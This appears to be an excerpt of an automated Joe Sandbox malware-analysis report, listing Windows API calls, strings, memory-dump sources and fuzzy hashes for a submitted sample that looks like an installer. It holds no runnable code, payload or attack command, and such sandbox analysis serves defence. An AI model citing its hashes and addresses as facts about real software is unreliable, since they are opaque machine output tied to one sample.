                                                            • Instruction ID: 16e9332b6476af0d686f12fa818e5571f82757a24bc5219822a197079b30e1ec
                                                            • Opcode Fuzzy Hash: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                            • Instruction Fuzzy Hash: D80192717447106AE710BF7A5C86B9B36649F04719F40427BF804AF2C7D6BE9C05476E
                                                            APIs
                                                              • Part of subcall function 00450918: SetEndOfFile.KERNEL32(?,?,0045C6A6,00000000,0045C831,?,00000000,00000002,00000002), ref: 0045091F
                                                            • FlushFileBuffers.KERNEL32(?), ref: 0045C7FD
                                                            Strings
                                                            • NumRecs range exceeded, xrefs: 0045C6FA
                                                            • EndOffset range exceeded, xrefs: 0045C731
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: File$BuffersFlush
                                                            • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                            • API String ID: 3593489403-659731555
                                                            • Opcode ID: 794c48d8177613dd3f63bd91f05815d926f9d199b7ec90082a892dce85f7227f
                                                            • Instruction ID: 42c6ccb15965a4bc01c0ab80d29458e35b3cecf9486565f2d0e9c4cbdba5a9bf
                                                            • Opcode Fuzzy Hash: 794c48d8177613dd3f63bd91f05815d926f9d199b7ec90082a892dce85f7227f
                                                            • Instruction Fuzzy Hash: A5617134A002988FDB24DF25C891AD9B7B5EF49305F0084DAED89AB352D774AEC9CF54
                                                            APIs
                                                              • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498586), ref: 0040334B
                                                              • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498586), ref: 00403356
                                                              • Part of subcall function 00406334: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498590), ref: 0040633A
                                                              • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                              • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                              • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                              • Part of subcall function 00406334: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498590), ref: 0040637E
                                                              • Part of subcall function 00409B88: 6F9C1CD0.COMCTL32(0049859A), ref: 00409B88
                                                              • Part of subcall function 00410964: GetCurrentThreadId.KERNEL32 ref: 004109B2
                                                              • Part of subcall function 00419050: GetVersion.KERNEL32(004985AE), ref: 00419050
                                                              • Part of subcall function 0044F754: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004985C2), ref: 0044F78F
                                                              • Part of subcall function 0044F754: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F795
                                                              • Part of subcall function 0044FBFC: GetVersionExA.KERNEL32(0049B790,004985C7), ref: 0044FC0B
                                                              • Part of subcall function 004531DC: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 004531FC
                                                              • Part of subcall function 004531DC: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453202
                                                              • Part of subcall function 004531DC: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 00453216
                                                              • Part of subcall function 004531DC: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045321C
                                                              • Part of subcall function 00456EEC: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456F10
                                                              • Part of subcall function 00464960: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004985EA), ref: 0046496F
                                                              • Part of subcall function 00464960: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464975
                                                              • Part of subcall function 0046D098: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046D0AD
                                                              • Part of subcall function 00478B3C: GetModuleHandleA.KERNEL32(kernel32.dll,?,004985F4), ref: 00478B42
                                                              • Part of subcall function 00478B3C: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478B4F
                                                              • Part of subcall function 00478B3C: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478B5F
                                                              • Part of subcall function 00495584: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 0049559D
                                                            • SetErrorMode.KERNEL32(00000001,00000000,0049863C), ref: 0049860E
                                                              • Part of subcall function 00498338: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498618,00000001,00000000,0049863C), ref: 00498342
                                                              • Part of subcall function 00498338: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498348
                                                              • Part of subcall function 004244E4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 00424503
                                                              • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                            • ShowWindow.USER32(?,00000005,00000000,0049863C), ref: 0049866F
                                                              • Part of subcall function 00482050: SetActiveWindow.USER32(?), ref: 004820FE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorFormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                            • String ID: Setup
                                                            • API String ID: 504348408-3839654196
                                                            • Opcode ID: 0b193bc7ab6d0367c14efa4071f6efbf19235d44a4c70119fe87f529ba434d3c
                                                            • Instruction ID: d131c851e578025af209eb9e9c2d0e6aaf1cfb04eb4cc82699b843ce611002a7
                                                            • Opcode Fuzzy Hash: 0b193bc7ab6d0367c14efa4071f6efbf19235d44a4c70119fe87f529ba434d3c
                                                            • Instruction Fuzzy Hash: 5C31D4702046409ED601BBBBED5352E3B98EB8A718B61487FF804D6553CE3D6C148A3E
                                                            APIs
                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453AFF,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A56
                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453AFF,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A5F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID: .tmp
                                                            • API String ID: 1375471231-2986845003
                                                            • Opcode ID: 3cb25ddd520bb7346a311bd12df13eef30655657fdbd9206c6de24d758997ec8
                                                            • Instruction ID: fcbeb811eea92760dd82faa40bdacdd366465f8a5342b7af386d3ee3900427bd
                                                            • Opcode Fuzzy Hash: 3cb25ddd520bb7346a311bd12df13eef30655657fdbd9206c6de24d758997ec8
                                                            • Instruction Fuzzy Hash: 5A213375A00208ABDB01EFA1C8429DEB7B9EB48305F50457BE801B7342DA789F058AA5
                                                            APIs
                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C596,00000000,0047C5AC,?,?,?,?,00000000), ref: 0047C372
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID: RegisteredOrganization$RegisteredOwner
                                                            • API String ID: 3535843008-1113070880
                                                            • Opcode ID: 3cef9cafc9ae7832fbb6eaa2bd4d40f0f71bbb09bcea78efdfdb807f20eb42b3
                                                            • Instruction ID: cd6b81515cbcb541a42d20c803a6709c30f964b406f28b15d8fe69fce277d2ff
                                                            • Opcode Fuzzy Hash: 3cef9cafc9ae7832fbb6eaa2bd4d40f0f71bbb09bcea78efdfdb807f20eb42b3
                                                            • Instruction Fuzzy Hash: 41F09030704204ABEB00D669ECD2BAA33A99746304F60C03FA9088B392D6799E01CB5C
                                                            APIs
                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,004756F3), ref: 004754E1
                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,004756F3), ref: 004754F8
                                                              • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateErrorFileHandleLast
                                                            • String ID: CreateFile
                                                            • API String ID: 2528220319-823142352
                                                            • Opcode ID: fa36eb7f5e292efbad873286b983b31a245b5f10299435e2a562660d120c4ecb
                                                            • Instruction ID: 40e201e46ebb19b1d9bf90fbf766f72b309683208074062896c4944ddf319cda
                                                            • Opcode Fuzzy Hash: fa36eb7f5e292efbad873286b983b31a245b5f10299435e2a562660d120c4ecb
                                                            • Instruction Fuzzy Hash: CDE065702403447FDA10F769CCC6F4577889B14729F10C155B5446F3D2C5B9EC408628
                                                            APIs
                                                            • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID: System\CurrentControlSet\Control\Windows$c6H
                                                            • API String ID: 71445658-1548894351
                                                            • Opcode ID: 532c08fc3a5ebe879a42036bede715a90f251433598981f36561c2967c82051c
                                                            • Instruction ID: b14c86e398362f8621ba381b59967aff518ca924b2daa5b46ce173f8349262a2
                                                            • Opcode Fuzzy Hash: 532c08fc3a5ebe879a42036bede715a90f251433598981f36561c2967c82051c
                                                            • Instruction Fuzzy Hash: BFD0C772950128BBDB00DA89DC41DFB775DDB15760F45441BFD049B141C1B4EC5197F8
                                                            APIs
                                                              • Part of subcall function 00456E7C: CoInitialize.OLE32(00000000), ref: 00456E82
                                                              • Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                              • Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                            • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456F10
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                            • String ID: SHCreateItemFromParsingName$shell32.dll
                                                            • API String ID: 2906209438-2320870614
                                                            • Opcode ID: 22a7af04fdfb7e1cbc8590484576be710a33bf4538556d1874791685a96bf942
                                                            • Instruction ID: 6d1f0b9ea2f83cf17b9d56af39d37ffc4890966232cc80b75afa5f9be50b51f8
                                                            • Opcode Fuzzy Hash: 22a7af04fdfb7e1cbc8590484576be710a33bf4538556d1874791685a96bf942
                                                            • Instruction Fuzzy Hash: 97C04CA1B4169096CB00B7FAA54361F2414DB5075FB96C07FBD40BB687CE7D8848AA2E
                                                            APIs
                                                              • Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                              • Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                            • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046D0AD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressErrorLibraryLoadModeProc
                                                            • String ID: SHPathPrepareForWriteA$shell32.dll
                                                            • API String ID: 2492108670-2683653824
                                                            • Opcode ID: 4bfb7ae62aec4cae49a8b0683f2b36ac3bef8159a448d5ae1ca26c94081968f3
                                                            • Instruction ID: 608de25eae135e4754017d8cf95b07e3007941af04aa8fd5541e4ba3120ba520
                                                            • Opcode Fuzzy Hash: 4bfb7ae62aec4cae49a8b0683f2b36ac3bef8159a448d5ae1ca26c94081968f3
                                                            • Instruction Fuzzy Hash: 69B092E0F056008ACF00A7F6984260A10059B8071DF90807B7440BB395EA3E840AAB6F
                                                            APIs
                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448719), ref: 0044865C
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486DD
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID:
                                                            • API String ID: 2574300362-0
                                                            • Opcode ID: 9e6f6b39164a2250cf52a4aeb4930d02d61dfc433358958cd5631fa5a9f36d71
                                                            • Instruction ID: bcb50df029510264ac3c8269deb9aca16d778d72fab4f9fb4f479d94b6d7f3fe
                                                            • Opcode Fuzzy Hash: 9e6f6b39164a2250cf52a4aeb4930d02d61dfc433358958cd5631fa5a9f36d71
                                                            • Instruction Fuzzy Hash: 09514170A00105AFDB40EFA5C491A9EBBF9EB54315F11817EA414BB392DA389E05CB99
                                                            APIs
                                                            • GetSystemMenu.USER32(00000000,00000000,00000000,0048183C), ref: 004817D4
                                                            • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 004817E5
                                                            • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 004817FD
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Menu$Append$System
                                                            • String ID:
                                                            • API String ID: 1489644407-0
                                                            • Opcode ID: 700b5811d02ba2ff172c742152fb081413fabfeab2321fa183ac7a2ab913d185
                                                            • Instruction ID: b36482c1273671328963914ac1a7ecaae55131090c894365c145815d0470a156
                                                            • Opcode Fuzzy Hash: 700b5811d02ba2ff172c742152fb081413fabfeab2321fa183ac7a2ab913d185
                                                            • Instruction Fuzzy Hash: 02318E307043445AD721FB359D82BAE3A989B15318F54593FB900AA3E3CA7C9C4A87AD
                                                            APIs
                                                            • 751C1520.VERSION(00000000,?,?,?,004972D0), ref: 0045251C
                                                            • 751C1500.VERSION(00000000,?,00000000,?,00000000,00452597,?,00000000,?,?,?,004972D0), ref: 00452549
                                                            • 751C1540.VERSION(?,004525C0,?,?,00000000,?,00000000,?,00000000,00452597,?,00000000,?,?,?,004972D0), ref: 00452563
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: C1500C1520C1540
                                                            • String ID:
                                                            • API String ID: 1315064709-0
                                                            • Opcode ID: 386d1b7d14527d93b72562f1672999fd2f5aa3ff7ed0da5cad2ac492ae89063e
                                                            • Instruction ID: b47a7e64509d5cca070909842564d4f4e78a1d1ae8fea26b0cdd83eea50adb12
                                                            • Opcode Fuzzy Hash: 386d1b7d14527d93b72562f1672999fd2f5aa3ff7ed0da5cad2ac492ae89063e
                                                            • Instruction Fuzzy Hash: 6B218371A00148AFDB01DAA989519AFB7FCEB4A300F55447BFC00E3342E6B99E04CB65
                                                            APIs
                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424422
                                                            • TranslateMessage.USER32(?), ref: 0042449F
                                                            • DispatchMessageA.USER32(?), ref: 004244A9
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Message$DispatchPeekTranslate
                                                            • String ID:
                                                            • API String ID: 4217535847-0
                                                            • Opcode ID: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                            • Instruction ID: 520fb342982be2dd3794930026bb259c1cd38a4fe19eb968f01b3c53081bdda3
                                                            • Opcode Fuzzy Hash: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                            • Instruction Fuzzy Hash: 781191307043205AEE20FA64AD41B9B73D4DFD1708F80481EF9D997382D77D9E49879A
                                                            APIs
                                                            • SetPropA.USER32(00000000,00000000), ref: 0041667A
                                                            • SetPropA.USER32(00000000,00000000), ref: 0041668F
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166B6
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Prop$Window
                                                            • String ID:
                                                            • API String ID: 3363284559-0
                                                            • Opcode ID: c3da473eafe02ab8e789e0609dcd6af1eaad0cb973784c7fd29191cc4dc7f6ad
                                                            • Instruction ID: 2262f6f032fbfc8c948eb6af5e1566575da4c35a9ecfa624f63ddadf83d7b404
                                                            • Opcode Fuzzy Hash: c3da473eafe02ab8e789e0609dcd6af1eaad0cb973784c7fd29191cc4dc7f6ad
                                                            • Instruction Fuzzy Hash: E3F0B271701210ABD710AB599C85FA632DCAB09719F160176BD09EF286C778DC40C7A8
                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 0041EE74
                                                            • IsWindowEnabled.USER32(?), ref: 0041EE7E
                                                            • EnableWindow.USER32(?,00000000), ref: 0041EEA4
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Window$EnableEnabledVisible
                                                            • String ID:
                                                            • API String ID: 3234591441-0
                                                            • Opcode ID: 8d68ea6b8e39d06ec6ae2b778d87487b924e250a5b1b44c5d2ba2f9a93d60018
                                                            • Instruction ID: eab114e884733e02e348d5fb54c1eeaedaab2d2a8f53f62e6f3f1b5b82b3488b
                                                            • Opcode Fuzzy Hash: 8d68ea6b8e39d06ec6ae2b778d87487b924e250a5b1b44c5d2ba2f9a93d60018
                                                            • Instruction Fuzzy Hash: 90E0EDB9100300AAE711AB2BEC81A57769CBB94314F45843BAC099B293DA3EDC409B78
                                                            APIs
                                                            • SetActiveWindow.USER32(?), ref: 0046A378
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ActiveWindow
                                                            • String ID: PrepareToInstall
                                                            • API String ID: 2558294473-1101760603
                                                            • Opcode ID: 2f09c314b6fb54b1472f2c84d4998d1c671ccdc982530a6e1a6c91392ff97de1
                                                            • Instruction ID: 163d609461ff3b9580316b21a780dec1cd9204125e937a74b025edb926540d27
                                                            • Opcode Fuzzy Hash: 2f09c314b6fb54b1472f2c84d4998d1c671ccdc982530a6e1a6c91392ff97de1
